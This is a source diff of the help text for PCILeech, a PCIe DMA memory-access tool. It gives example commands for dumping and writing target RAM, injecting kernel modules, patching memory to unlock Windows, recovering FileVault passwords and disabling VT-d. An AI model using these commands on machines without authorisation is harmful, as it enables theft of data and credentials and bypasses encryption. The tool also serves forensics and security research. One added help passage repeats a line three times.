-		" Usage: connect USB3380 device to target computer and USB cable to the computer\n" \
-		" executing pcileech.exe.  If all memory reads fail try to re-insert the device.\n" \
-		" - It is only possible to access the lower 4GB of RAM (32-bit) with DMA.       \n" \
-		" - It may not be possible to access RAM if OS configured IOMMU (VT-d).         \n" \
-		"   macOS defaults to VT-d. Windows 10 may, if configured, also use VT-d.       \n" \
-		" - No drivers are needed on the target! Memory acquisition is all in hardware! \n" \
-		" - Confirmed working with PCIe/mPCIe/ExpressCard/Thunderbolt.                  \n" \
-		" - If kernel module is successfully inserted in lower 4GB RAM more RAM will be \n" \
-		"   possible to read. Extended funtionality will also be made available.        \n" \
-		" ----------------                                                              \n");
-	Help_ShowGeneral();
+    printf(
+        " PCILEECH INFORMATION                                                          \n" \
+        " PCILeech (c) 2016-2018 Ulf Frisk                                              \n" \
+        " Version: 3.0                                                                  \n" \
+        " License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007                 \n" \
+        " Contact information: pcileech@frizk.net                                       \n" \
+        " System requirements: 64-bit Windows 7, 10 or Linux.                           \n" \
+        " Other project references:                                                     \n" \
+        "   PCILeech          - https://github.com/ufrisk/pcileech                      \n" \
+        "   PCILeech-FPGA     - https://github.com/ufrisk/pcileech-fpga                 \n" \
+        "   Google USB Driver - https://developer.android.com/sdk/win-usb.html          \n" \
+        "   FTDI FT601 Driver - http://www.ftdichip.com/Drivers/D3XX.htm                \n" \
+        "   Dokany            - https://github.com/dokan-dev/dokany/releases/latest     \n" \
+        " ----------------                                                              \n" \
+        " Use with memory dump files in read-only mode.                                 \n" \
+        " Use with USB3380 hardware programmed as a PCILeech device.                    \n" \
+        " Use with FPGA harware programmed as a PCILeech FPGA device.                   \n" \
+        " Use with SP605 hardware / 'PCI Express DIY hacking toolkit' by cr4sh/@d_olex. \n\n" \
+        " ----------------                                                              \n" \
+        " Driver information (USB3380/Windows):                                         \n" \
+        "   The USB3380 HW requires a dummy driver to function properly. The PCILeech   \n" \
+        "   device masks as a Google Glass. Please download and install the Google USB  \n" \
+        "   driver before proceeding by using the USB3380 device. USB3 is recommended   \n" \
+        "   to performance reasons (USB2 will work but impact performance).             \n" \
+        " Driver information (FPGA/FT601/Windows):                                      \n" \
+        "   The PCILeech programmed FPGA board with FT601 USB3 requires drivers for USB.\n" \
+        "   The drivers are on Windows update and is installed at first use.            \n" \
+        "   PCILeech also requires the FTDI application library (DLL). Download DLL from\n" \
+        "   FTDI web site and place the 64-bit FTD3XX.dll alongside pcileech.exe.       \n" \
+        " Driver information (Dokany/Windows):                                          \n" \
+        "   To be able to use the 'mount' functionality for filesystem browsing and live\n" \
+        "   memory file access PCILeech requires Dokany to be installed for virtual file\n" \
+        "   system support. Please download and install Dokany on your computer before  \n" \
+        "   using the mount functionality.                                              \n" \
+        " Driver information (Libusb/Linux):                                            \n" \
+        "   PCILeech on Linux requires that libusb is installed. Libusb is most probably\n" \
+        "   installed by default, if not install by running:apt-get install libusb-1.0-0\n" \
+        " ----------------                                                              \n" \
+        " Notes about the PCILeech USB3380 device:                                      \n" \
+        " Usage: connect USB3380 device to target computer and USB cable to the computer\n" \
+        " executing pcileech. If all memory reads fail try to re-insert the device.     \n" \
+        " - It is only possible to access the lower 4GB of RAM (32-bit) with DMA.       \n" \
+        " - It may not be possible to access RAM if OS configured IOMMU (VT-d).         \n" \
+        "   macOS defaults to VT-d. Windows 10 may, if configured, also use VT-d.       \n" \
+        " - No drivers are needed on the target! Memory acquisition is all in hardware! \n" \
+        " - Confirmed working with PCIe/mPCIe/ExpressCard/Thunderbolt.                  \n" \
+        " - If kernel module is successfully inserted in lower 4GB RAM more RAM will be \n" \
+        "   possible to read. Extended funtionality will also be made available.        \n" \
+        " ----------------                                                              \n");
+    Help_ShowGeneral();
 }
 
 VOID _HelpShowExecCommand(_In_ PCONFIG pCfg)
 {
-	BOOL result;
-	PKMDEXEC pKmdExec = NULL;
-	result = Util_LoadKmdExecShellcode(pCfg->szShellcodeName, &pKmdExec);
-	if(!result) {
-		printf("HELP: Failed loading shellcode from file: '%s.ksh' ...\n", pCfg->szShellcodeName);
-		return;
-	}
-	printf(
-		" SHELLCODE IMPLANT HELP: Execute a custom implant in the target kernel.        \n" \
-		" MODES   : KMD                                                                 \n" \
-		" OPTIONS : -in, -out, -s, -0, -1, -2, -3, -4, -5, -6, -7, -8, -9               \n");
-	printf(" Implant loaded from file: %s.ksh\n", pCfg->szShellcodeName);
-	printf(
-		" Implant specific help (output values are left empty/set to zero):             \n" \
-		" ============================================================================= \n");
-	printf(pKmdExec->szOutFormatPrintf,	"", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0);
-	LocalFree(pKmdExec);
+    BOOL result;
+    PKMDEXEC pKmdExec = NULL;
+    result = Util_LoadKmdExecShellcode(pCfg->szShellcodeName, &pKmdExec);
+    if(!result) {
+        printf("HELP: Failed loading shellcode from file: '%s.ksh' ...\n", pCfg->szShellcodeName);
+        return;
+    }
+    printf(
+        " SHELLCODE IMPLANT HELP: Execute a custom implant in the target kernel.        \n" \
+        " MODES   : KMD                                                                 \n" \
+        " OPTIONS : -in, -out, -s, -0, -1, -2, -3, -4, -5, -6, -7, -8, -9               \n");
+    printf(" Implant loaded from file: %s.ksh\n", pCfg->szShellcodeName);
+    printf(
+        " Implant specific help (output values are left empty/set to zero):             \n" \
+        " ============================================================================= \n");
+    printf(pKmdExec->szOutFormatPrintf, "", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0);
+    LocalFree(pKmdExec);
 }
 
 VOID Help_ShowDetailed(_In_ PCONFIG pCfg)
 {
-
-	switch(pCfg->tpAction) {
-	case DUMP:
-		printf(
-			" DUMP MEMORY FROM TARGET SYSTEM TO FILE.                                       \n" \
-			" MODES   : DMA, KMD                                                            \n" \
-			" OPTIONS : -min, -max, -out, -force                                            \n" \
-			" The physical memory is dumped to file. If no file is specified in the -out    \n" \
-			" option then a default named file is created. When dumping in DMA mode PCILeech\n" \
-			" tries to dump memory between 0-4GB unless a separate range is specified by the\n" \
-			" -min and -max parameters. When dumping in KMD mode readable physical memory   \n" \
-			" accessible to the kernel is dumped unless a separate range is specified in the\n" \
-			" -min and -max options. Memory related to PCIe and devices is not dumped (these\n" \
-			" memory ranges are written as zeroes) unless the -force option is specified.   \n" \
-			" Please note that using the -force option may result in a system crash.        \n" \
-			" The DUMP command dumps 4kB memory pages. Partial pages are not supported.     \n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) dump memory up to 4GB by using native DMA:                                 \n" \
-			"    pcileech dump                                                              \n" \
-			" 2) dump memory as seen by the kernel:                                         \n" \
-			"    pcileech dump -kmd 0x7fffe000                                              \n" \
-			" 3) dump memory between 5GB and 6GB:                                           \n" \
-			"    pcileech dump -kmd 0x7fffe000 -min 0x140000000 -max 0x180000000            \n" \
-			" 4) dump memory to file c:\\temp\\out.raw:                                     \n" \
-			"    pcileech dump -kmd 0x7fffe000 -out \"c:\\temp\\out.raw\"                   \n");
-		break;
-	case WRITE:
-		printf(
-			" WRITE DATA TO TARGET SYSTEM MEMORY.                                           \n" \
-			" MODES   : DMA, KMD                                                            \n" \
-			" OPTIONS : -min, -in, -force                                                   \n" \
-			" WRITE will write contents specified in the -in option to the memory address   \n" \
-			" specified by the -min option. The memory address may be unaligned. It is also \n" \
-			" possible to try to write to non-accessible memory - such as PCIe memory mapped\n" \
-			" devices with the -force option. Please note that using the -force option may  \n" \
-			" result in a system crash. In KMD mode the write is performed by the target    \n" \
-			" operating system. In DMA mode the write is performed by the PCILeech device.  \n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) write the bytes 11223344 to the physical address 0x1003                    \n" \
-			"    pcileech write -min 0x1003 -in 11223344                                    \n" \
-			" 2) write contents in the file replace.bin to the address 0x140000000          \n" \
-			"    pcileech write -min 0x140000000 -in replace.bin -kmd 0x7fffe000            \n" \
-			" 3) write the bytes 11223344 to the protected address 0xfffe0008               \n" \
-			"    pcileech write -min 0xfffe0008 -in 11223344 -force                         \n");
-		break;
-	case PATCH:
-		printf(
-			" PATCH THE MEMORY OF THE TARGET SYSTEM.                                        \n" \
-			" MODES   : DMA, KMD                                                            \n" \
-			" OPTIONS : -min, -max, -sig, -all, -force                                      \n" \
-			" Patch loads one or several signatures from the .sig file specified in the -sig\n" \
-			" option. The -sig option should be specified without file extension. The memory\n" \
-			" is scanned until the first signature match is made. The memory is then patched\n" \
-			" with new contents according to the loaded signature. After a match has been   \n" \
-			" made PCILeech exits. If all available memory should be searched for signatures\n" \
-			" please supply the -all option. The options -min and -max may also optionally  \n" \
-			" be given to limit the memory space searched. Patching is performed per 4096   \n" \
-			" byte page. Signatures spanning multiple pages are unsupported.                \n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) try patch the memory with the unlock_win10x64 signature (kmd not loaded)   \n" \
-			"    pcileech patch -sig unlock_win10x64                                        \n" \
-			" 2) patch the memory with the unlock_win10x64 signature (kmd loaded)           \n" \
-			"    pcileech patch -sig unlock_win10x64 -kmd 0x7fffe000                        \n" \
-			" 3) patch all occurences with the patch_test signature                         \n" \
-			"    pcileech patch -sig patch_test -kmd 0x7fffe000 -all                        \n");
-		break;
-	case SEARCH:
-		printf(
-			" SEARCH THE MEMORY OF THE TARGET SYSTEM FOR THE GIVEN SIGNATURE.               \n" \
-			" MODES   : DMA, KMD                                                            \n" \
-			" OPTIONS : -min, -max, -sig, -in, -all, -force                                 \n" \
-			" Search the memory for signatures specified in the -sig or -in options. If the \n" \
-			" -sig option is specified signatures are loaded from the signature file and are\n" \
-			" search for at their fixed page offsets. If the signature is specified with the\n" \
-			" -in option the whole memory at all page offsets is searched. The memory ranges\n" \
-			" searched can be limited by supplying optional -min and -max options. It is    \n" \
-			" also possible to search restricted memory by supplying the -force option. When\n" \
-			" a signature is found the search is stopped unless the -all option is given.   \n" \
-			" Searching is performed per 4096 byte page. Signatures spanning multiple pages \n" \
-			" are unsupported.                                                              \n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) search for the first location that matches the unlock_win10x64 signature.  \n" \
-			"    pcileech search -sig unlock_win10x64                                       \n" \
-			" 2) search for all locations that matches the unlock_win10x64 signature.       \n" \
-			"    pcileech search -sig unlock_win10x64 -all                                  \n" \
-			" 3) search for all unlock_win10x64 locations by using a kernel module.         \n" \
-			"    pcileech search -sig unlock_win10x64 -all -kmd 0x7fffe000                  \n" \
-			" 3) search for all locations that contain the pattern 444d4152.                \n" \
-			"    pcileech search -in 444d4152 -all -kmd 0x7fffe000                          \n" \
-			" 4) search for the first location containing the pattern in the file pat.bin.  \n" \
-			"    pcileech search -in pat.bin -all -kmd 0x7fffe000                           \n");
-		break;
-	case MOUNT:
-		printf(
-			" MOUNT TARGET LIVE RAM AND FILE SYSTEM AS 'NETWORK DRIVE'.                     \n" \
-			" MODES   : KMD                                                                 \n" \
-			" OPTIONS : -s                                                                  \n" \
-			" Mount the target system live ram and file system as the drive letter specified\n" \
-			" in the -s option. If the -s option is not specified PCILeech will try to mount\n" \
-			" the target file system as the K: drive letter.                                \n" \
-			" File system mount is currently supported for: macOS, Windows and Linux.  There\n" \
-			" are limitations that are important to know, please see below. Use at own risk!\n" \
-			"  - Create file: not implemented.                                              \n" \
-			"  - Write to files may be buggy and may in rare cases corrupt the target file. \n" \
-			"  - Delete file will most often work, but with errors.                         \n" \
-			"  - Delete directory, rename/move file and other features may not be supported.\n" \
-			"  - Only the C:\\ driver is mounted on Windows target systems.                 \n" \
-			" The target system files are found in the files directory.   The live memory of\n" \
-			" the target system is mapped into the file: liveram.raw.    Writing to the live\n" \
-			" memory may crash the target system. Use with care.   Copying files and dumping\n" \
-			" memory via the PCILeech virtual file system will work but the performance will\n" \
-			" be better when using the built in commandline commands when performing actions\n" \
-			" like the ones mentioned above.Supported only when running PCILeech on Windows.\n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) mount file system and live RAM of target as the default K: drive letter.   \n" \
-			"    pcileech mount -kmd 0x7fffe000                                             \n" \
-			" 2) mount file system and live RAM of target as X: drive letter.               \n" \
-			"    pcileech mount -kmd 0x7fffe000 -s X                                        \n");
-		break;
-	case DISPLAY:
-		printf(
-			" DISPLAY MEMORY ON SCREEN.                                                     \n" \
-			" MODES   : DMA, KMD                                                            \n" \
-			" OPTIONS : -min, -max (optional)                                               \n" \
-			" The memory contents between min and max is shown on screen.                   \n" \
-			" Use the -min option to specify the memory location.                           \n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) display memory starting at physical address 0x1000.                        \n" \
-			"    pcileech display -min 0x1000                                               \n" \
-			" 2) display memory between 0x1000 and 0x2fff.                                  \n" \
-			"    pcileech display -min 0x1000 -max 0x2fff                                   \n" \
-			" 3) display memory starting at physical address 0x140000000 (5GB).             \n" \
-			"    pcileech display -min 0x140000000 -kmd 0x7fffe000                          \n");
-		break;
-	case PAGEDISPLAY:
-		printf(
-			" DISPLAY A MEMORY PAGE ON SCREEN.                                              \n" \
-			" MODES   : DMA, KMD                                                            \n" \
-			" OPTIONS : -min                                                                \n" \
-			" The memory contents of a single page (4096 bytes) is shown on screen. Use the \n" \
-			" -min option to specify the memory location. If the -min option is not aligned \n" \
-			" the specified memory address will be truncated. It is also possible to force  \n" \
-			" reading of otherwise inaccessible memory with the -force option.              \n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) display the page starting at physical address 0x1000.                      \n" \
-			"    pcileech pagedisplay -min 0x1000                                           \n" \
-			" 2) display the normally restricted page at physical address 0xf0000.          \n" \
-			"    pcileech pagedisplay -min 0xf0000 -force                                   \n" \
-			" 3) display the page at address 0x140000000 (5GB).                             \n" \
-			"    pcileech pagedisplay -min 0x140000000 -kmd 0x7fffe000                      \n");
-		break;
-	case TESTMEMREAD:
-	case TESTMEMREADWRITE:
-		printf(
-			" TEST READING AND/OR READING+WRITING TO A PHYSICAL MEMORY ADDRESS.             \n" \
-			" MODES   : DMA                                                                 \n" \
-			" Used for debug purposes. Test reading and/or reading+writing to a physical    \n" \
-			" memory address with DMA. The address page read and optionally written to is   \n" \
-			" specified by the -min option. If the address is inside a protected range then \n" \
-			" the -force option could be specified to override. A number of reads and writes\n" \
-			" are executed. Unless there is a catastrophic failure the page is restored to  \n" \
-			" its original state after testing writes with testmemreadwrite.                \n" \
-			" EXAMPLES:                                                                     \n" \
-			" 1) test reading from the memory address at 0x1000                             \n" \
-			"    pcileech testmemread -min 0x1000                                           \n" \
-			" 1) test reading from the normally protected address 0xf4000000                \n" \
-			"    pcileech testmemread -min 0xf4000000 -force                                \n" \
-			" 2) test reading and writing to/from the memory address 0x1000                 \n" \
-			"    pcileech testmemreadwrite -min 0x1000                                      \n");
-		break;
-	case KMDLOAD:
-		printf(
-			" LOAD A KERNEL MODULE INTO THE OPERATING SYSTEM KERNEL FOR LATER USE.          \n" \
-			" MODES   : DMA                                                                 \n" \
-			" OPTIONS : -kmd, -pt, -cr3                                                     \n" \
-			" Load a kernel module into the running operating system kernel for later use.  \n" \
-			" The kernel module is specified in the -kmd paramter. If the specified kernel  \n" \
-			" module is generic and memory searches are supported it will be searched for   \n" \
-			" in memory. Specialized windows 10 kernel module are loaded by hi-jacking the  \n" \
-			" page table. The page table is searched for automatically with the -pt option. \n" \
-			" The page table base may also optionally be specified in the -cr3 option.      \n" \
-			" EXAMPLES:                                                                     \n" \
-			" 1) load a kernel module into Windows Vista by specifying a generic signature. \n" \
-			"    pcileech kmdload -kmd winvistax64                                          \n" \
-			" 2) load a kernel module into Linux by specifying a generic signature.         \n" \
-			"    pcileech kmdload -kmd LINUX_X64                                            \n" \
-			" 3) load a kernel module into Windows 10 by targeting a specific driver.       \n" \
-			"    pcileech kmdload -kmd win10x64_ntfs_20160716 -pt                           \n");
-		break;
-	case KMDEXIT:
-		printf(
-			" UNLOAD AN ACTIVE KERNEL MODULE FROM THE TARGET SYSTEM.                        \n" \
-			" MODES   : KMD                                                                 \n" \
-			" OPTIONS :                                                                     \n" \
-			" Unload an active kernel module from the target system. The already active     \n" \
-			" kernel module is asked to terminate and clean up itself as best as possible.  \n" \
-			" After running the kmdexit command it will not be possible to access the       \n" \
-			" kernel module any more.                                                       \n" \
-			" EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
-			" 1) unload the already loaded kernel module.                                   \n" \
-			"    pcileech kmdexit -kmd 0x7fffe000                                           \n");
-		break;
-	case MAC_FVRECOVER:
-		printf(
-			" RECOVER FILEVAULT 2 PASSWORD FROM A LOCKED macOS SYSTEM.                      \n" \
-			" MODES   : DMA                                                                 \n" \
-			" OPTIONS :                                                                     \n" \
-			" Plug in the PCILeech device to any macOS system with a Thunderbolt 2 port. You\n" \
-			" will be asked to reboot if PCILeech is ready. After the reboot PCILeech will  \n" \
-			" try to figure out the filevault 2 full disk encryption password used to unlock\n" \
-			" the disk crypto. This issue has been patched in macOS Sierra 10.12.2.         \n" \
-			" A small memory dump will also be written to disk. In case PCILeech is uable to\n" \
-			" automatically figure out the password this memory dump may be used. In order  \n" \
-			" for PCILeech to figure out the password only ascii characters may be used; if \n" \
-			" other unicode characters exist in the password PCILeech will not be able to   \n" \
-			" automatically recover the password. (CVE-2016-7585).                          \n" \
-			" EXAMPLES:                                                                     \n" \
-			" 1) recover the filevault 2 disk encryption password.                          \n" \
-			"    pcileech.exe mac_fvrecover                                                 \n");
-		break;
-	case MAC_FVRECOVER2:
-		printf(
-			" RECOVER FILEVAULT 2 PASSWORD FROM A macOS SYSTEM IMMEDIATELY AFTER UNLOCK.    \n" \
-			" MODES   : DMA                                                                 \n" \
-			" OPTIONS :                                                                     \n" \
-			" Plug in the PCILeech device to any macOS system with a Thunderbolt 2 port.    \n" \
-			" Wait for the user to enter the filefault 2 password to unlock the computer.   \n" \
-			" Immediately after unlock VT-d DMA protections are dropped for a short while   \n" \
-			" and the password can be recovered in a similar way to the MAV_FVRECOVER       \n" \
-			" command. (CVE-2016-7585).                                                     \n" \
-			" EXAMPLES:                                                                     \n" \
-			" 1) recover the filevault 2 disk encryption password immediately after unlock. \n" \
-			"    pcileech.exe mac_fvrecover2                                                \n");
-		break;
-	case MAC_DISABLE_VTD:
-		printf(
-			" DISABLE Vt-d DMA PROTECTIONS IMMEDIATELY AFTER macOS BOOT.                    \n" \
-			" MODES   : DMA                                                                 \n" \
-			" OPTIONS :                                                                     \n" \
-			" Plug in the PCILeech device to any macOS system with a Thunderbolt 2 port.    \n" \
-			" Wait for the user to enter the filefault 2 password to unlock the computer.   \n" \
-			" Immediately after unlock VT-d DMA protections are dropped for a short while   \n" \
-			" and it is possible to disable the in-memory DMAR ACPI table - which results   \n" \
-			" in completely disabled VT-d protections until the computer is rebooted.       \n" \
-			" (CVE-2016-7585).                                                              \n" \
-			" EXAMPLES:                                                                     \n" \
-			" 1) disable Vt-d DMA protections immediately after macOS boot.                 \n" \
-			"    pcileech.exe mac_disablevtd                                                \n");
-		break;
-	case PT_PHYS2VIRT:
-		printf(
-			" SEARCH FOR VIRTUAL ADDRESS MAPPED TO GIVEN PHYSICAL ADDRESS.                  \n" \
-			" MODES   : DMA, KMD                                                            \n" \
-			" OPTIONS : -cr3, -0                                                            \n" \
-			" Walk the page table of which base is specified on the 'cr3' option to find the\n" \
-			" first occurrence of a virtual address mapped to the physical address specified\n" \
-			" in the '0' option. If an entry is found the virtual address and the PTE will  \n" \
-			" be displayed. Only the first occurrence will be displayed.                    \n" \
-			" EXAMPLEs:                                                                     \n" \
-			" 1) search for virtual address mapped to physical 0xfed90000 given a page table\n" \
-			"    (PML4) base at: 0x1aa000.                                                  \n" \
-			"    pcileech.exe pt_phys2virt -cr3 0x1aa000 -0 0xfed90000                      \n");
-		break;
-	case TLP:
-		printf(
-			" TRANSMIT AND RECEIVE RAW PCIe TLPs                                            \n" \
-			" MODES   : DMA                                                                 \n" \
-			" OPTIONS : -in, -vv, -wait                                                     \n" \
-			" Transmit and receive PCIe TLPs. Requires supported devices such as the SP605. \n" \
-			" The USB3380 is not a supported device. Multiple TLPs may be stacked. If not   \n" \
-			" specifying an -in parameter no TLP will be sent. Specify the -vv setting to   \n" \
-			" display received and sent TLPs. The default listen time is 0.5s, if a longer  \n" \
-			" listen time is required specify it with the -wait parameter.                  \n" \
-			" Supported only when running PCILeech on Windows.                              \n" \
-			" EXAMPLEs:                                                                     \n" \
-			" 1) Listen for incoming TLPs for 10s:                                          \n" \
-			"    pcileech.exe -vv -wait 10                                                  \n");
-		break;
-	case PROBE:
-		printf(
-			" PROBE MEMORY FOR READABLE PAGES                                               \n" \
-			" MODES   : DMA                                                                 \n" \
-			" Probe a memory region specified by defaults or -min, -max for readable pages. \n" \
-			" This is done in a device-effifient manner. Probing is performed in DMA mode.  \n" \
-			" The USB3380 is not a supported device.                                        \n" \
-			" EXAMPLEs:                                                                     \n" \
-			" 1) Probe memory up to 10GB                                                    \n" \
-			"    pcileech.exe probe -max 0x280000000                                        \n");
-		break;
-	case EXEC:
-		_HelpShowExecCommand(pCfg);
-		break;
-	default:
-		printf(
-			" Detailed help for this command or implant is not available.                   \n");
-		break;
-	}
+    switch(pCfg->tpAction) {
+    case DUMP:
+        printf(
+            " DUMP MEMORY FROM TARGET SYSTEM TO FILE.                                       \n" \
+            " MODES   : DMA, KMD                                                            \n" \
+            " OPTIONS : -min, -max, -out, -force                                            \n" \
+            " The physical memory is dumped to file. If no file is specified in the -out    \n" \
+            " option then a default named file is created. When dumping in DMA mode PCILeech\n" \
+            " tries to dump memory between 0-4GB unless a separate range is specified by the\n" \
+            " -min and -max parameters. When dumping in KMD mode readable physical memory   \n" \
+            " accessible to the kernel is dumped unless a separate range is specified in the\n" \
+            " -min and -max options. Memory related to PCIe and devices is not dumped (these\n" \
+            " memory ranges are written as zeroes) unless the -force option is specified.   \n" \
+            " Please note that using the -force option may result in a system crash.        \n" \
+            " The DUMP command dumps 4kB memory pages. Partial pages are not supported.     \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) dump memory up to 4GB by using native DMA:                                 \n" \
+            "    pcileech dump                                                              \n" \
+            " 2) dump memory as seen by the kernel:                                         \n" \
+            "    pcileech dump -kmd 0x7fffe000                                              \n" \
+            " 3) dump memory between 5GB and 6GB:                                           \n" \
+            "    pcileech dump -kmd 0x7fffe000 -min 0x140000000 -max 0x180000000            \n" \
+            " 4) dump memory to file c:\\temp\\out.raw:                                     \n" \
+            "    pcileech dump -kmd 0x7fffe000 -out \"c:\\temp\\out.raw\"                   \n");
+        break;
+    case WRITE:
+        printf(
+            " WRITE DATA TO TARGET SYSTEM MEMORY.                                           \n" \
+            " MODES   : DMA, KMD                                                            \n" \
+            " OPTIONS : -min, -in, -force                                                   \n" \
+            " WRITE will write contents specified in the -in option to the memory address   \n" \
+            " specified by the -min option. The memory address may be unaligned. It is also \n" \
+            " possible to try to write to non-accessible memory - such as PCIe memory mapped\n" \
+            " devices with the -force option. Please note that using the -force option may  \n" \
+            " result in a system crash. In KMD mode the write is performed by the target    \n" \
+            " operating system. In DMA mode the write is performed by the PCILeech device.  \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) write the bytes 11223344 to the physical address 0x1003                    \n" \
+            "    pcileech write -min 0x1003 -in 11223344                                    \n" \
+            " 2) write contents in the file replace.bin to the address 0x140000000          \n" \
+            "    pcileech write -min 0x140000000 -in replace.bin -kmd 0x7fffe000            \n" \
+            " 3) write the bytes 11223344 to the protected address 0xfffe0008               \n" \
+            "    pcileech write -min 0xfffe0008 -in 11223344 -force                         \n");
+        break;
+    case PATCH:
+        printf(
+            " PATCH THE MEMORY OF THE TARGET SYSTEM.                                        \n" \
+            " MODES   : DMA, KMD                                                            \n" \
+            " OPTIONS : -min, -max, -sig, -all, -force                                      \n" \
+            " Patch loads one or several signatures from the .sig file specified in the -sig\n" \
+            " option. The -sig option should be specified without file extension. The memory\n" \
+            " is scanned until the first signature match is made. The memory is then patched\n" \
+            " with new contents according to the loaded signature. After a match has been   \n" \
+            " made PCILeech exits. If all available memory should be searched for signatures\n" \
+            " please supply the -all option. The options -min and -max may also optionally  \n" \
+            " be given to limit the memory space searched. Patching is performed per 4096   \n" \
+            " byte page. Signatures spanning multiple pages are unsupported.                \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) try patch the memory with the unlock_win10x64 signature (kmd not loaded)   \n" \
+            "    pcileech patch -sig unlock_win10x64                                        \n" \
+            " 2) patch the memory with the unlock_win10x64 signature (kmd loaded)           \n" \
+            "    pcileech patch -sig unlock_win10x64 -kmd 0x7fffe000                        \n" \
+            " 3) patch all occurences with the patch_test signature                         \n" \
+            "    pcileech patch -sig patch_test -kmd 0x7fffe000 -all                        \n");
+        break;
+    case SEARCH:
+        printf(
+            " SEARCH THE MEMORY OF THE TARGET SYSTEM FOR THE GIVEN SIGNATURE.               \n" \
+            " MODES   : DMA, KMD                                                            \n" \
+            " OPTIONS : -min, -max, -sig, -in, -all, -force                                 \n" \
+            " Search the memory for signatures specified in the -sig or -in options. If the \n" \
+            " -sig option is specified signatures are loaded from the signature file and are\n" \
+            " search for at their fixed page offsets. If the signature is specified with the\n" \
+            " -in option the whole memory at all page offsets is searched. The memory ranges\n" \
+            " searched can be limited by supplying optional -min and -max options. It is    \n" \
+            " also possible to search restricted memory by supplying the -force option. When\n" \
+            " a signature is found the search is stopped unless the -all option is given.   \n" \
+            " Searching is performed per 4096 byte page. Signatures spanning multiple pages \n" \
+            " are unsupported.                                                              \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) search for the first location that matches the unlock_win10x64 signature.  \n" \
+            "    pcileech search -sig unlock_win10x64                                       \n" \
+            " 2) search for all locations that matches the unlock_win10x64 signature.       \n" \
+            "    pcileech search -sig unlock_win10x64 -all                                  \n" \
+            " 3) search for all unlock_win10x64 locations by using a kernel module.         \n" \
+            "    pcileech search -sig unlock_win10x64 -all -kmd 0x7fffe000                  \n" \
+            " 3) search for all locations that contain the pattern 444d4152.                \n" \
+            "    pcileech search -in 444d4152 -all -kmd 0x7fffe000                          \n" \
+            " 4) search for the first location containing the pattern in the file pat.bin.  \n" \
+            "    pcileech search -in pat.bin -all -kmd 0x7fffe000                           \n");
+        break;
+    case MOUNT:
+        printf(
+            " MOUNT TARGET LIVE RAM AND FILE SYSTEM AS 'NETWORK DRIVE'.                     \n" \
+            " MODES   : KMD                                                                 \n" \
+            " OPTIONS : -s                                                                  \n" \
+            " Mount the target system live ram and file system as the drive letter specified\n" \
+            " in the -s option. If the -s option is not specified PCILeech will try to mount\n" \
+            " the target file system as the K: drive letter.                                \n" \
+            " File system comes with two main functionalities, mount target system files if \n" \
+            " hardware device is used, and mount memory process file system (in read-only   \n" \
+            " mode when dump file is used, in read-write mode when hardware device is used).\n" \
+            " ------------------------------------------------------------------------------\n" \
+            " mode when dump file is used, in read-write mode when hardware device is used).\n" \
+            " mode when dump file is used, in read-write mode when hardware device is used).\n" \
+            " mode when dump file is used, in read-write mode when hardware device is used).\n" \
+            " ------------------------------------------------------------------------------\n" \
+            " File system mount is currently supported for: macOS, Windows and Linux.  There\n" \
+            " are limitations that are important to know, please see below. Use at own risk!\n" \
+            "  - Create file: not implemented.                                              \n" \
+            "  - Write to files may be buggy and may in rare cases corrupt the target file. \n" \
+            "  - Delete file will most often work, but with errors.                         \n" \
+            "  - Delete directory, rename/move file and other features may not be supported.\n" \
+            "  - Only the C:\\ driver is mounted on Windows target systems.                 \n" \
+            " The target system files are found in the files directory.    The memory of the\n" \
+            " target system is mapped into the files: liveram-kmd.raw and liveram-native.raw\n" \
+            " Writing to the live memory may crash the target system.      Copying files and\n" \
+            " dumping memory via the PCILeech virtual file system will work but  performance\n" \
+            " will be better when using the built in commandline commands.                  \n" \
+            " - Mount it only supported only when running PCILeech on Windows.              \n" \
+            " - Mount of live RAM without kernel module is only supported on FPGA hardware. \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) Mount file system and live RAM of target as the default K: drive letter.   \n" \
+            "    pcileech mount -kmd 0x7fffe000                                             \n" \
+            " 2) Mount file system and live RAM of target as X: drive letter.               \n" \
+            "    pcileech mount -kmd 0x7fffe000 -s X                                        \n" \
+            " 3) Mount live ram and proc file system only using FPGA hardware.              \n" \
+            "    pcileech mount -max 0x21e5fffff                                            \n" \
+            " 4) Mount live ram and 'proc' file system by specifying a specific CR3/PML4.   \n" \
+            "    prileech mount -cr3 0x1ab000                                               \n" \
+        );
+        break;
+    case DISPLAY:
+        printf(
+            " DISPLAY MEMORY ON SCREEN.                                                     \n" \
+            " MODES   : DMA, KMD                                                            \n" \
+            " OPTIONS : -min, -max (optional)                                               \n" \
+            " The memory contents between min and max is shown on screen.                   \n" \
+            " Use the -min option to specify the memory location.                           \n" \
+            " EXAMPLES:      (example kernel module is loaded at address 0x7fffe000)        \n" \
+            " 1) display memory starting at physical address 0x1000.                        \n" \
+            "    pcileech display -min 0x1000                                               \n" \
+            " 2) display memory between 0x1000 and 0x2fff.                                  \n" \
+            "    pcileech display -min 0x1000 -max 0x2fff                                   \n" \
+            " 3) display memory starting at physical address 0x140000000 (5GB).             \n" \
+            "    pcileech display -min 0x140000000 -kmd 0x7fffe000                          \n");
+        break;
+    case PAGEDISPLAY:
+        printf(
+            " DISPLAY A MEMORY PAGE ON SCREEN.                                              \n" \
+            " MODES   : DMA, KMD                                                            \n" \
